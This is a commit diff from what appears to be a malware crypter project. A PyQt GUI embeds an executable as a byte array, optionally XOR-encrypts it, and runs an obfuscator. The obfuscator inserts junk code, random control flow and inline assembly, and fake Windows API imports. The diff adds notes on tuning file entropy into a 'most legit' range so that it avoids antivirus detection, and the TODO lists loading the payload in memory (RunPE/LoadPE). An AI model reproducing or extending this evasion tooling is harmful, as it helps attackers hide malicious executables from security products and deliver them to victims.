update
This commit is contained in:
21
gui.py
21
gui.py
@@ -9,12 +9,11 @@
|
|||||||
|
|
||||||
"""
|
"""
|
||||||
TODO :
|
TODO :
|
||||||
- LoadPE (KEKW)
|
|
||||||
- Good Section sizes
|
- Good Section sizes
|
||||||
- Random Windows API calls (help)
|
- Random Windows API calls (help)
|
||||||
|
|
||||||
Done :
|
Done :
|
||||||
- RunPE
|
- LoadPE
|
||||||
- Junk code
|
- Junk code
|
||||||
- Control flow
|
- Control flow
|
||||||
- IAT obfuscation (adding "normal" imports in addition to the others)
|
- IAT obfuscation (adding "normal" imports in addition to the others)
|
||||||
@@ -23,6 +22,12 @@ Done :
|
|||||||
- Code signing
|
- Code signing
|
||||||
- Good entropy
|
- Good entropy
|
||||||
- Add resources (random number of random generated bitmaps) --> Not used because it increases the entropy too much
|
- Add resources (random number of random generated bitmaps) --> Not used because it increases the entropy too much
|
||||||
|
|
||||||
|
Note about entropy :
|
||||||
|
Entropy: between 0 and 8
|
||||||
|
"Most legit" range : [4.8; 6.8]
|
||||||
|
"Most malicious" range : [7.2; 8.0]
|
||||||
|
Best entropy : 6.4
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from PyQt5 import QtCore, QtGui, QtWidgets
|
from PyQt5 import QtCore, QtGui, QtWidgets
|
||||||
@@ -38,6 +43,7 @@ class Ui_mainWindow(object):
|
|||||||
self.xor = False
|
self.xor = False
|
||||||
self.cflow = False
|
self.cflow = False
|
||||||
self.junk = False
|
self.junk = False
|
||||||
|
self.filepath = ""
|
||||||
self.icon_path = ""
|
self.icon_path = ""
|
||||||
|
|
||||||
def setupUi(self, mainWindow):
|
def setupUi(self, mainWindow):
|
||||||
@@ -79,7 +85,7 @@ class Ui_mainWindow(object):
|
|||||||
self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
|
self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
|
||||||
self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
|
self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
|
||||||
self.spinBox.setObjectName("spinBox")
|
self.spinBox.setObjectName("spinBox")
|
||||||
self.spinBox.setValue(6)
|
self.spinBox.setValue(8)
|
||||||
self.spinBox.setMinimum(1)
|
self.spinBox.setMinimum(1)
|
||||||
self.label_3 = QtWidgets.QLabel(self.centralwidget)
|
self.label_3 = QtWidgets.QLabel(self.centralwidget)
|
||||||
self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
|
self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
|
||||||
@@ -90,7 +96,7 @@ class Ui_mainWindow(object):
|
|||||||
self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
|
self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
|
||||||
self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
|
self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
|
||||||
self.spinBox_2.setObjectName("spinBox_2")
|
self.spinBox_2.setObjectName("spinBox_2")
|
||||||
self.spinBox_2.setValue(2)
|
self.spinBox_2.setValue(3)
|
||||||
self.spinBox_2.setMinimum(1)
|
self.spinBox_2.setMinimum(1)
|
||||||
self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
|
self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
|
||||||
self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))
|
self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))
|
||||||
@@ -135,8 +141,8 @@ class Ui_mainWindow(object):
|
|||||||
self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
|
self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
|
||||||
|
|
||||||
def generate(self) :
|
def generate(self) :
|
||||||
in_filename = self.pushButton.text()
|
in_filename = self.filepath
|
||||||
out_filename = in_filename.split(".")[0] + "_out.exe"
|
out_filename = self.pushButton.text().split(".")[0] + "_out.exe"
|
||||||
xor_key = ''
|
xor_key = ''
|
||||||
|
|
||||||
if self.xor :
|
if self.xor :
|
||||||
@@ -152,6 +158,7 @@ class Ui_mainWindow(object):
|
|||||||
self.label_2.setText("Creating sample header...")
|
self.label_2.setText("Creating sample header...")
|
||||||
QCoreApplication.processEvents()
|
QCoreApplication.processEvents()
|
||||||
|
|
||||||
|
print(f"Filename : {in_filename}")
|
||||||
file = bytearray(open(in_filename, 'rb').read())
|
file = bytearray(open(in_filename, 'rb').read())
|
||||||
with open("sample.h", 'w') as output:
|
with open("sample.h", 'w') as output:
|
||||||
output.write("unsigned char sample[] = { ")
|
output.write("unsigned char sample[] = { ")
|
||||||
@@ -171,6 +178,7 @@ class Ui_mainWindow(object):
|
|||||||
# Working with a copy of main.cpp
|
# Working with a copy of main.cpp
|
||||||
os.rename("main.cpp", "DO_NOT_TOUCH.cpp")
|
os.rename("main.cpp", "DO_NOT_TOUCH.cpp")
|
||||||
shutil.copyfile('DO_NOT_TOUCH.cpp', 'main.cpp')
|
shutil.copyfile('DO_NOT_TOUCH.cpp', 'main.cpp')
|
||||||
|
|
||||||
with open("config.h", "w") as c :
|
with open("config.h", "w") as c :
|
||||||
c.write(f'#pragma once\n#define KEY "{xor_key}"')
|
c.write(f'#pragma once\n#define KEY "{xor_key}"')
|
||||||
|
|
||||||
@@ -240,6 +248,7 @@ class Ui_mainWindow(object):
|
|||||||
if filePath:
|
if filePath:
|
||||||
# Display the selected file path in the QLineEdit
|
# Display the selected file path in the QLineEdit
|
||||||
self.pushButton.setText(filePath.split("/")[-1:][0])
|
self.pushButton.setText(filePath.split("/")[-1:][0])
|
||||||
|
self.filepath = filePath
|
||||||
|
|
||||||
|
|
||||||
def IconfileDialog(self):
|
def IconfileDialog(self):
|
||||||
|
|||||||
@@ -10,7 +10,7 @@ Creates :
|
|||||||
- Random control flow
|
- Random control flow
|
||||||
"""
|
"""
|
||||||
|
|
||||||
types = ["short", "unsigned short", "int", "unsigned int", "long", "unsigned long", "float", "double"]
|
types = ["short", "unsigned short", "int", "unsigned int", "long", "unsigned long"] #"float", "double"]
|
||||||
operations = ["-", "+", "^", "*", "/"]
|
operations = ["-", "+", "^", "*", "/"]
|
||||||
global_vars = {}
|
global_vars = {}
|
||||||
functions = []
|
functions = []
|
||||||
@@ -60,8 +60,10 @@ def GetRandomFunction() :
|
|||||||
functions.append(name)
|
functions.append(name)
|
||||||
|
|
||||||
body = "int "+name+"(const char* a1) {\n"
|
body = "int "+name+"(const char* a1) {\n"
|
||||||
|
body += "\tif (a1 <= (void*)0x00100000) return 0;\n"
|
||||||
|
body += "\tchar aaa = ((char)((int)'0' + 1));\n"
|
||||||
body += f"\tint bb = {GetRandomNumber()};\n"
|
body += f"\tint bb = {GetRandomNumber()};\n"
|
||||||
body += "\tfor (int i = 0; i < 10; i++) {\n\t\tCreateMutexA(NULL, false, a1);\n\t\tbb++;\n\t}\n\treturn bb;\n}"
|
body += "\tfor (int i = 0; i < 10; i++) {\n\t\tCreateMutexA(NULL, false, &aaa);\n\t\tbb++;\n\t}\n\treturn bb;\n}"
|
||||||
|
|
||||||
return body
|
return body
|
||||||
|
|
||||||
@@ -79,7 +81,7 @@ def GetAsmBlock(branch1, branch2, var, end, sub) :
|
|||||||
"""+branch1+""":"""
|
"""+branch1+""":"""
|
||||||
|
|
||||||
|
|
||||||
if GetRandomRange(0, 4) > 1 :
|
if GetRandomRange(0, 4) > 2 :
|
||||||
branch1 = GetRandomString(20)
|
branch1 = GetRandomString(20)
|
||||||
branch2_ = GetRandomString(20)
|
branch2_ = GetRandomString(20)
|
||||||
asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
|
asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
|
||||||
@@ -100,7 +102,7 @@ def GetRandomAssemblyBlock() :
|
|||||||
|
|
||||||
r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
|
r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
|
||||||
|
|
||||||
for i in range(GetRandomRange(0, 30)) :
|
for i in range(GetRandomRange(0, 15)) :
|
||||||
branch1 = GetRandomString(20)
|
branch1 = GetRandomString(20)
|
||||||
branch2 = GetRandomString(20)
|
branch2 = GetRandomString(20)
|
||||||
end = GetRandomString(20)
|
end = GetRandomString(20)
|
||||||
@@ -113,11 +115,11 @@ def generate_switch_statement(variable_name, exit_value, depth=0):
|
|||||||
indent = " " * depth
|
indent = " " * depth
|
||||||
switch_code = f"{indent}switch ({variable_name}) {{\n"
|
switch_code = f"{indent}switch ({variable_name}) {{\n"
|
||||||
|
|
||||||
num_cases = GetRandomRange(2, 5)
|
num_cases = GetRandomRange(1, 4)
|
||||||
for _ in range(num_cases):
|
for _ in range(num_cases):
|
||||||
case_value = GetRandomRange(1, 10**6)
|
case_value = GetRandomRange(1, 10**6)
|
||||||
switch_code += f"{indent} case {case_value}:\n"
|
switch_code += f"{indent} case {case_value}:\n"
|
||||||
if depth < 2 and GetRandomRange(0, 4) > 1 :
|
if depth < 2 and GetRandomRange(0, 4) > 2 :
|
||||||
switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
|
switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
|
||||||
else:
|
else:
|
||||||
switch_code += f"{indent} {{\n"
|
switch_code += f"{indent} {{\n"
|
||||||
@@ -146,6 +148,7 @@ def GetRandomControlFlow():
|
|||||||
|
|
||||||
return cpp_code
|
return cpp_code
|
||||||
|
|
||||||
|
FILES_TO_OBFUSCATE = {"main.cpp":"DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
|
||||||
def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
||||||
if PASS < CFLOW_PASS : PASS = CFLOW_PASS
|
if PASS < CFLOW_PASS : PASS = CFLOW_PASS
|
||||||
|
|
||||||
@@ -156,8 +159,11 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
|||||||
global in_func
|
global in_func
|
||||||
func_def_pattern = r'\b\w+\s+\w+\s*\([^)]*\)\s*'
|
func_def_pattern = r'\b\w+\s+\w+\s*\([^)]*\)\s*'
|
||||||
|
|
||||||
f = open("DO_NOT_TOUCH.cpp", "r")
|
for outfile, infile in FILES_TO_OBFUSCATE.items():
|
||||||
o = open("main.cpp", "w")
|
if PASS == 0 : break;
|
||||||
|
|
||||||
|
f = open(infile, "r")
|
||||||
|
o = open(outfile, "w")
|
||||||
out = []
|
out = []
|
||||||
|
|
||||||
lines = f.readlines()
|
lines = f.readlines()
|
||||||
@@ -165,8 +171,10 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
|||||||
in_comment = False
|
in_comment = False
|
||||||
in_switch = False
|
in_switch = False
|
||||||
in_asm = False
|
in_asm = False
|
||||||
|
in_dowhile = False
|
||||||
can_code = False
|
can_code = False
|
||||||
wait_for_func_close = False
|
wait_for_func_close = False
|
||||||
|
in_debug = False
|
||||||
global_vars = {}
|
global_vars = {}
|
||||||
functions = []
|
functions = []
|
||||||
out = []
|
out = []
|
||||||
@@ -198,17 +206,29 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
|||||||
pass
|
pass
|
||||||
elif "break;" in line and can_code :
|
elif "break;" in line and can_code :
|
||||||
can_code = False
|
can_code = False
|
||||||
|
if "#ifdef _DEBUG" in line :
|
||||||
|
in_debug = True
|
||||||
|
elif in_debug and "#endif" in line :
|
||||||
|
in_debug = False
|
||||||
|
continue
|
||||||
|
if "do {" in line :
|
||||||
|
in_dowhile = True
|
||||||
|
elif in_dowhile and "while" in line :
|
||||||
|
in_dowhile = False
|
||||||
|
continue
|
||||||
|
|
||||||
|
if in_debug : continue
|
||||||
|
if in_dowhile : continue
|
||||||
a = "{" in line or "}" in line or "#" in line
|
a = "{" in line or "}" in line or "#" in line
|
||||||
b = re.search(func_def_pattern, line) != None
|
b = re.search(func_def_pattern, line) != None
|
||||||
|
|
||||||
if not can_code :
|
if not can_code :
|
||||||
if b or a or in_comment or in_switch or in_asm : continue # we can't write
|
if b or a or in_comment or in_switch or in_asm : continue # we can't write
|
||||||
|
|
||||||
if GetRandomBool() and junk : # do we create a variable ?
|
if GetRandomBool() and junk and k < PASS : # do we create a variable ?
|
||||||
out.append(GetRandomVar()+"\n")
|
out.append(GetRandomVar()+"\n")
|
||||||
|
|
||||||
if GetRandomBool() and in_func and junk: # do we do an operation on globals ?
|
if GetRandomBool() and in_func and junk and k < PASS : # do we do an operation on globals ?
|
||||||
out.append(GetRandomOperation()+"\n")
|
out.append(GetRandomOperation()+"\n")
|
||||||
|
|
||||||
if GetRandomBool() and not in_func : # do we create a function ?
|
if GetRandomBool() and not in_func : # do we create a function ?
|
||||||
@@ -281,6 +301,7 @@ DWORD ADVAPI32214_Array[] = { (DWORD)RegCreateKeyA, (DWORD)RegSetValueA, (DWORD)
|
|||||||
#include <Prsht.h>\r\n
|
#include <Prsht.h>\r\n
|
||||||
#include <Userenv.h>\r\n"""
|
#include <Userenv.h>\r\n"""
|
||||||
|
|
||||||
|
if outfile == "main.cpp" :
|
||||||
out.insert(0, fake_api)
|
out.insert(0, fake_api)
|
||||||
out.insert(0, static_imports)
|
out.insert(0, static_imports)
|
||||||
out.insert(0, fake_libs)
|
out.insert(0, fake_libs)
|
||||||
|
|||||||
Reference in New Issue
Block a user